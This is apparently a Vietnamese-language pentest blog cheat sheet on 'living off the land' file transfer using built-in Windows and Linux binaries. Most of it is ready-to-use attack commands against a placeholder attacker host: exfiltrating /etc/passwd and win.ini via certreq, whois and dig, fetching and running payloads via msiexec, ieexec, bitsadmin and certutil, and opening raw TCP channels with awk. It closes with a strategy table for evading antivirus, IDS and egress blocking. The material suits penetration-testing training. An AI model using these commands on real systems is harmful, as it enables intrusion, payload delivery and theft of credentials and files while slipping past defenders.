Living off the Land — File Transfer (LOLBins / GTFOBins)

Posted Apr 16, 2026

By Mr.Kevin

views 3 min read

LOLBins (Living off the Land Binaries) = tận dụng binary có sẵn trên hệ thống để thực hiện hành vi ngoài mục đích ban đầu.
Windows → LOLBAS
Linux → GTFOBins

Tư duy cốt lõi: Trước khi upload tool mới → hỏi: “Binary nào đang có sẵn trên máy này làm được việc mình cần?”

🪟 Windows — LOLBAS

certreq.exe — Upload file (exfiltration)

# Attacker: lắng nghe
sudo nc -lvnp 8000

# Victim: gửi file
certreq.exe -Post -config http://<ATTACKER_IP>:8000/ c:\windows\win.ini

certutil.exe — Download file

certutil.exe -verifyctl -split -f http://<ATTACKER_IP>:8000/nc.exe

AMSI hiện tại đã detect certutil usage → dễ bị flag. Biết để dùng khi cần, nhưng cân nhắc môi trường.

bitsadmin / BITS — Download file

bitsadmin /transfer wcb /priority foreground http://<ATTACKER_IP>:8000/nc.exe C:\Users\Public\nc.exe

  
Import-Module bitstransfer
Start-BitsTransfer -Source "http://<ATTACKER_IP>:8000/nc.exe" -Destination "C:\Windows\Temp\nc.exe"

BITS là Windows Update service → ít bị nghi ngờ hơn so với certutil.

msiexec.exe — Download + Execute

msiexec /q /i http://<ATTACKER_IP>:8000/payload.msi

Desktopimgdownldr.exe — Download file

set "SYSTEMROOT=C:\Windows\Temp" && cmd /c desktopimgdownldr.exe /lockscreenurl:http://<ATTACKER_IP>:8000/nc.exe /eventName:desktopimgdownldr

ftp.exe — Scripted Download

echo open <ATTACKER_IP> 21 > ftp.txt
echo USER anonymous >> ftp.txt
echo binary >> ftp.txt
echo GET nc.exe >> ftp.txt
echo bye >> ftp.txt
ftp -v -n -s:ftp.txt

finger.exe — Exfiltration qua port 79

finger user@<ATTACKER_IP>

expand.exe — Copy file từ UNC path

expand \\<ATTACKER_IP>\share\file.bat C:\Users\Public\file.bat

makecab.exe — Đóng gói file trước khi exfil

makecab C:\Users\Public\sensitive.txt C:\Users\Public\sensitive.cab

ieexec.exe — Chạy app từ URL

ieexec.exe http://<ATTACKER_IP>:8000/payload.exe

🐧 Linux — GTFOBins

openssl — Encrypted transfer (TLS)

  
# Attacker: tạo certificate + dựng server
openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem
openssl s_server -quiet -accept 80 -cert certificate.pem -key key.pem < /tmp/LinEnum.sh

# Victim: download
openssl s_client -connect <ATTACKER_IP>:80 -quiet > LinEnum.sh

Traffic được mã hóa TLS → IDS/IPS khó inspect nội dung.

Python / PHP / Ruby / Perl

  
# Python 3
python3 -c "import urllib.request; urllib.request.urlretrieve('http://<ATTACKER_IP>:8000/file', '/tmp/file')"

# PHP
php -r "file_put_contents('/tmp/file', file_get_contents('http://<ATTACKER_IP>:8000/file'));"

# Ruby
ruby -e "require 'net/http'; File.write('/tmp/file', Net::HTTP.get(URI('http://<ATTACKER_IP>:8000/file')))"

# Perl
perl -e "use LWP::Simple; getstore('http://<ATTACKER_IP>:8000/file', '/tmp/file');"

awk — Mở TCP connection

awk 'BEGIN{s="/inet/tcp/0/<ATTACKER_IP>/8000"; while((s|&getline line)>0) print line; close(s)}'

whois — Exfiltration

  
# Attacker: lắng nghe
nc -lvnp 4444

# Victim: gửi data
whois -h <ATTACKER_IP> -p 4444 `cat /etc/passwd`

dig — Exfiltration qua DNS

dig @<ATTACKER_IP> -f /etc/passwd

DNS (port 53) hiếm khi bị block → rất hữu ích khi outbound bị hạn chế.

base64 — Transfer qua bất kỳ text channel

  
# Victim: encode
base64 -w0 /etc/passwd

# Attacker: decode
echo "<base64_string>" | base64 -d > passwd

Bảng tổng hợp

Tool	OS	Chức năng	Ghi chú
`certreq.exe`	Windows	Upload/Exfil	HTTP POST
`certutil.exe`	Windows	Download	⚠️ AMSI detect
`bitsadmin` / BITS	Windows	Download	Windows service hợp lệ
`msiexec.exe`	Windows	Download + Execute
`desktopimgdownldr.exe`	Windows	Download	Ít phổ biến → ít bị chú ý
`ftp.exe`	Windows	Download	Scripted, anonymous
`finger.exe`	Windows	Exfil	Port 79
`openssl`	Linux	Upload/Download	Encrypted TLS
`python/php/ruby/perl`	Linux	Download	Nếu interpreter có sẵn
`awk`	Linux	Download	TCP connection
`whois`	Linux	Exfil	Port 4444
`dig`	Linux	Exfil	DNS port 53
`base64`	Linux	Upload/Download	Mọi text channel

Chiến lược chọn kỹ thuật

Không có curl/wget?        → python, php, ruby, perl, awk
Bị block port thường?      → port 53 (DNS/dig), port 79 (finger), port 443 (openssl)
Cần tránh AV (Windows)?    → bitsadmin, desktopimgdownldr (tránh certutil)
Cần mã hóa traffic?        → openssl s_server/s_client
Chỉ có text channel?       → base64 encode → copy/paste → decode

Pentest, File Transfer

This post is licensed under CC BY 4.0 by the author.

🪟 Windows — LOLBAS

certreq.exe — Upload file (exfiltration)

certutil.exe — Download file

bitsadmin / BITS — Download file

msiexec.exe — Download + Execute

Desktopimgdownldr.exe — Download file

ftp.exe — Scripted Download

finger.exe — Exfiltration qua port 79

expand.exe — Copy file từ UNC path

makecab.exe — Đóng gói file trước khi exfil

ieexec.exe — Chạy app từ URL

🐧 Linux — GTFOBins

openssl — Encrypted transfer (TLS)

Python / PHP / Ruby / Perl

awk — Mở TCP connection

whois — Exfiltration

dig — Exfiltration qua DNS

base64 — Transfer qua bất kỳ text channel

Bảng tổng hợp

Chiến lược chọn kỹ thuật

Trending Tags